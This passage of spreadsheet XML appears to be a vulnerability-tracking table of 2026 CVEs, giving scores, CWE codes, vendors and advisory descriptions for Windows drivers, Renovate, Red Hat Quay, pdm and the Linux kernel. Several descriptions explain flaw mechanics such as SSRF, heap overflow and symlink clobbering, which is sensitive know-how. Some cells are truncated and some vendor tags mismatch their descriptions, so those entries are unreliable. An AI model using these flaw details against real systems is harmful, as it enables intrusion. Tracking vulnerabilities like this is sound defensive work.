        </is>
      </c>
    </row>
    <row r="1432">
      <c r="A1432" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88884</t>
        </is>
      </c>
      <c r="C1432" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D1432" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1432" s="5" t="inlineStr"/>
      <c r="F1432" s="5" t="inlineStr"/>
      <c r="G1432" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1432" s="5" t="inlineStr"/>
      <c r="I1432" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1432" s="5" t="inlineStr"/>
      <c r="K1432" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1432" s="5" t="inlineStr">
        <is>
          <t>Renovate is a dependency update automation tool. In versions before 44.3.1 (and Mend Renovate CE/EE images before 15.4.0, mend-renovate-ce Helm chart before 15.4.0, mend-renovate-enterprise-edition Helm chart before 10.4.0), digest updates are not subject to the internal `minimumReleaseAge` (stability age) checks. When a repository configures `minimumReleaseAge` and has dependencies with `updateType=digest` — for example GitHub Actions pinned to a commit SHA with a floating tag, Docker images, Go modules or NuGet packages — Renovate will still open a pull request for a newly published digest, marked only with a pending `renovate/stability-days` status check. A newly published, potentially malicious dependency version can therefore cause a PR to be raised and CI workflows to potentially run before the configured minimum release age has elapsed, which is precisely what the Minimum Release Age control is intended to prevent. The issue is fixed in Renovate 44.3.1; as a workaround, digest updates can be disabled or gated behind `dependencyDashboardApproval`.</t>
        </is>
      </c>
      <c r="M1432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88884</t>
        </is>
      </c>
    </row>
    <row r="1433">
      <c r="A1433" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15927</t>
        </is>
      </c>
      <c r="C1433" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1433" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1433" s="5" t="inlineStr"/>
      <c r="F1433" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1433" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H1433" s="5" t="inlineStr"/>
      <c r="I1433" s="5" t="inlineStr">
        <is>
          <t>2026-07-21</t>
        </is>
      </c>
      <c r="J1433" s="5" t="inlineStr"/>
      <c r="K1433" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1433" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Red Hat Quay's repository-level mirror configuration
feature. The POST and PUT handlers in endpoints/api/mirror.py accept an
external_reference parameter without SSRF validation, unlike the
organization-level mirror handlers which apply validate_external_registry_url().
A repository administrator can supply a crafted hostname that causes the Quay
mirror worker to make requests via Skopeo to internal network services, cloud
metadata endpoints, or other resources not intended to be reachable from the
Quay application.</t>
        </is>
      </c>
      <c r="M1433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15927</t>
        </is>
      </c>
    </row>
    <row r="1434">
      <c r="A1434" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18796</t>
        </is>
      </c>
      <c r="C1434" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1434" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1434" s="5" t="inlineStr"/>
      <c r="F1434" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1434" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H1434" s="5" t="inlineStr"/>
      <c r="I1434" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1434" s="5" t="inlineStr"/>
      <c r="K1434" s="5" t="inlineStr">
        <is>
          <t>CWE-1342</t>
        </is>
      </c>
      <c r="L1434" s="5" t="inlineStr">
        <is>
          <t>Any application that
     uses external QSPI flash for encrypted XIP on nRF5340 and relies on that
     encryption for confidentiality and/or integrity of the externally stored
     code. No specific nRF Connect SDK version is the root cause; the weakness
     is in the on-the-fly decryption scheme.</t>
        </is>
      </c>
      <c r="M1434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18796</t>
        </is>
      </c>
    </row>
    <row r="1435">
      <c r="A1435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47763</t>
        </is>
      </c>
      <c r="C1435" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1435" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1435" s="5" t="inlineStr"/>
      <c r="F1435" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1435" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1435" s="5" t="inlineStr"/>
      <c r="I1435" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1435" s="5" t="inlineStr"/>
      <c r="K1435" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="L1435" s="5" t="inlineStr">
        <is>
          <t>pdm is a Python package and dependency manager supporting the latest PEP standards. In versions prior to 2.27.0, pdm writes several project-local state or configuration files without symlink protection. If a malicious repository places those files as symlinks, local PDM operations can overwrite the symlink targets. This creates an arbitrary file clobber primitive relative to the privileges of the invoking user. Config.__init__() resolves the project-local pdm.toml path and _save_config() writes to the resolved target. If PROJECT_ROOT/pdm.toml is a symlink to another file, pdm config -l ... updates the target file instead of refusing the write.
The same general problem exists for other project-local persistence paths that are written directly with no lstat / O_NOFOLLOW protection. For the pdm.toml PoC specifically, the target file must already contain parseable TOML. Otherwise the load step fails before the write path is reached. That parser constraint does not apply to the .pdm-python or .python-version sinks. This issue has been fixed in version 2.27.0.</t>
        </is>
      </c>
      <c r="M1435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47763</t>
        </is>
      </c>
    </row>
    <row r="1436">
      <c r="A1436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49349</t>
        </is>
      </c>
      <c r="C1436" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1436" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1436" s="5" t="inlineStr"/>
      <c r="F1436" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1436" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1436" s="5" t="inlineStr"/>
      <c r="I1436" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1436" s="5" t="inlineStr"/>
      <c r="K1436" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L1436" s="5" t="inlineStr">
        <is>
          <t>regclient is a Docker and OCI Registry Client in Go. Prior to version 0.11.5, credentials for a registry may be inadvertently leaked to external servers. A prerequisite for this attack is a malicious registry server, a malicious blob store, or a registry that does not restrict the external URLs for foreign blobs. Version 0.11.5 fixes the issue.</t>
        </is>
      </c>
      <c r="M1436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49349</t>
        </is>
      </c>
    </row>
    <row r="1437">
      <c r="A1437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53196</t>
        </is>
      </c>
      <c r="C1437" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1437" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1437" s="5" t="inlineStr"/>
      <c r="F1437" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1437" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1437" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1437" s="5" t="inlineStr">
        <is>
          <t>2026-06-25</t>
        </is>
      </c>
      <c r="J1437" s="5" t="inlineStr"/>
      <c r="K1437" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1437" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
USB: serial: io_ti: fix heap overflow in get_manuf_info()
get_manuf_info() reads le16_to_cpu(rom_desc-&gt;Size) bytes from the
device I2C EEPROM into a buffer allocated with kmalloc_obj(), which
is sizeof(struct edge_ti_manuf_descriptor) = 10 bytes.
The Size field comes from the device and is only validated (in
check_i2c_image()) to make sure the descriptor fits within
TI_MAX_I2C_SIZE (16384 bytes), not against the destination buffer size.
A malicious USB device can therefore set Size to any value up to 16377,
causing a heap overflow of up to 16367 bytes when plugged into a host
running this driver.
valid_csum() is called after read_rom() and also iterates
buffer[0..Size-1], compounding the out-of-bounds access.
Fix by rejecting descriptors with unexpected length before calling
read_rom().
[ johan: amend commit message; also check for short descriptors ]</t>
        </is>
      </c>
      <c r="M1437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53196</t>
        </is>
      </c>
    </row>
    <row r="1438">
      <c r="A1438" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65812</t>
        </is>
      </c>
      <c r="C1438" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1438" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1438" s="5" t="inlineStr"/>
      <c r="F1438" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1438" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1438" s="5" t="inlineStr"/>
      <c r="I1438" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1438" s="5" t="inlineStr"/>
      <c r="K1438" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L1438" s="5" t="inlineStr">
        <is>
          <t>Insertion of sensitive information into sent data in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65812</t>
        </is>
      </c>
    </row>
    <row r="1439">
      <c r="A1439" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67352</t>
        </is>
      </c>
      <c r="C1439" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1439" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1439" s="5" t="inlineStr"/>
      <c r="F1439" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1439" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1439" s="5" t="inlineStr"/>
      <c r="I1439" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1439" s="5" t="inlineStr"/>
      <c r="K1439" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1439" s="5" t="inlineStr">
        <is>
          <t>luci-app-h</t>
        </is>
      </c>
      <c r="M1439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67352</t>
        </is>
      </c>
    </row>
    <row r="1440">
      <c r="A1440" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68833</t>
        </is>
      </c>
      <c r="C1440" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1440" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1440" s="5" t="inlineStr"/>
      <c r="F1440" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1440" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1440" s="5" t="inlineStr"/>
      <c r="I1440" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1440" s="5" t="inlineStr"/>
      <c r="K1440" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1440" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68833</t>
        </is>
      </c>
    </row>
    <row r="1441">
      <c r="A1441" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69415</t>
        </is>
      </c>
      <c r="C1441" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1441" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1441" s="5" t="inlineStr"/>
      <c r="F1441" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1441" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1441" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1441" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1441" s="5" t="inlineStr"/>
      <c r="K1441" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1441" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows DHCP Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69415</t>
        </is>
      </c>
    </row>
    <row r="1442">
      <c r="A1442" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69490</t>
        </is>
      </c>
      <c r="C1442" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1442" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1442" s="5" t="inlineStr"/>
      <c r="F1442" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1442" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1442" s="5" t="inlineStr"/>
      <c r="I1442" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1442" s="5" t="inlineStr"/>
      <c r="K1442" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1442" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="M1442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69490</t>
        </is>
      </c>
    </row>
    <row r="1443">
      <c r="A1443" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69566</t>
        </is>
      </c>
      <c r="C1443" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1443" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1443" s="5" t="inlineStr"/>
      <c r="F1443" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1443" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1443" s="5" t="inlineStr"/>
      <c r="I1443" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1443" s="5" t="inlineStr"/>
      <c r="K1443" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1443" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69566</t>
        </is>
      </c>
    </row>
    <row r="1444">
      <c r="A1444" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71329</t>
        </is>
      </c>
      <c r="C1444" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1444" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1444" s="5" t="inlineStr"/>
      <c r="F1444" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1444" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1444" s="5" t="inlineStr"/>
      <c r="I1444" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1444" s="5" t="inlineStr"/>
      <c r="K1444" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1444" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71329</t>
        </is>
      </c>
    </row>
    <row r="1445">
      <c r="A1445" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71348</t>
        </is>
      </c>
      <c r="C1445" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1445" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1445" s="5" t="inlineStr"/>
      <c r="F1445" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1445" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1445" s="5" t="inlineStr"/>
      <c r="I1445" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1445" s="5" t="inlineStr"/>
      <c r="K1445" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1445" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t>
        </is>
      </c>
      <c r="M1445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71348</t>
        </is>
      </c>
    </row>
    <row r="1446">
      <c r="A1446" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71349</t>
        </is>
      </c>
      <c r="C1446" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1446" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1446" s="5" t="inlineStr"/>
      <c r="F1446" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1446" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1446" s="5" t="inlineStr"/>
      <c r="I1446" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1446" s="5" t="inlineStr"/>
      <c r="K1446" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1446" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t>
        </is>
      </c>
      <c r="M1446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71349</t>
        </is>
      </c>
    </row>
    <row r="1447">
      <c r="A1447" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71350</t>
        </is>
      </c>
      <c r="C1447" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1447" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1447" s="5" t="inlineStr"/>
      <c r="F1447" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1447" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1447" s="5" t="inlineStr"/>
      <c r="I1447" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1447" s="5" t="inlineStr"/>
      <c r="K1447" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1447" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t>
        </is>
      </c>
      <c r="M1447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71350</t>
        </is>
      </c>
    </row>
    <row r="1448">
      <c r="A1448" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72985</t>
        </is>
      </c>
      <c r="C1448" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1448" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1448" s="5" t="inlineStr"/>
      <c r="F1448" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1448" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1448" s="5" t="inlineStr"/>
      <c r="I1448" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1448" s="5" t="inlineStr"/>
      <c r="K1448" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1448" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Shadow Copy allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="M1448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72985</t>
        </is>
      </c>
    </row>
    <row r="1449">
      <c r="A1449" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72999</t>
        </is>
      </c>
      <c r="C1449" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1449" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1449" s="5" t="inlineStr"/>
      <c r="F1449" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1449" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1449" s="5" t="inlineStr"/>
      <c r="I1449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1449" s="5" t="inlineStr"/>
      <c r="K1449" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1449" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Hub Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="M1449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72999</t>
        </is>
      </c>
    </row>
    <row r="1450">
      <c r="A1450" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76227</t>
        </is>
      </c>
      <c r="C1450" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1450" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1450" s="5" t="inlineStr"/>
      <c r="F1450" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1450" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1450" s="5" t="inlineStr"/>
      <c r="I1450" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1450" s="5" t="inlineStr"/>
      <c r="K1450" s="5" t="inlineStr">
        <is>
          <t>CWE-526</t>
        </is>
      </c>
      <c r="L1450" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 42.68.1 before 42.96.3 (and from 42.68.1 before 43.4.4), including corresponding Docker images (renovate/renovate, mend/renovate-ce, renovate-ee-server, renovate-ee-worker &gt;=13.3.0 &lt;13.6.0), fail to restrict environment variables to an allowlist when spawning child processes. As a result, child processes (e.g. npm install, postUpgradeTasks, postUpdateOptions) gain full access to all environment variables of the Renovate process, allowing insider or outside attackers to exfiltrate secrets accessible to the Renovate deployment.</t>
        </is>
      </c>
      <c r="M1450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76227</t>
        </is>
      </c>
    </row>
    <row r="1451">
      <c r="A1451" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77892</t>
        </is>
      </c>
      <c r="C1451" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1451" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1451" s="5" t="inlineStr"/>
      <c r="F1451" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1451" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1451" s="5" t="inlineStr"/>
      <c r="I1451" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1451" s="5" t="inlineStr"/>
      <c r="K1451" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L1451" s="5" t="inlineStr">
        <is>
          <t>No cwe for this issue in Windows Boot Manager allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="M1451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77892</t>
        </is>
      </c>
    </row>
    <row r="1452">
      <c r="A1452" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78451</t>
        </is>
      </c>
      <c r="C1452" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1452" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1452" s="5" t="inlineStr"/>
      <c r="F1452" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1452" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1452" s="5" t="inlineStr"/>
      <c r="I1452" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1452" s="5" t="inlineStr"/>
      <c r="K1452" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1452" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Microsoft Windows SCSI Class System File allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="M1452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78451</t>
        </is>
      </c>
    </row>
    <row r="1453">
      <c r="A1453" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78579</t>
        </is>
      </c>
      <c r="C1453" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1453" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1453" s="5" t="inlineStr"/>
      <c r="F1453" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1453" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H1453" s="5" t="inlineStr"/>
      <c r="I1453" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1453" s="5" t="inlineStr"/>
      <c r="K1453" s="5" t="inlineStr">
        <is>
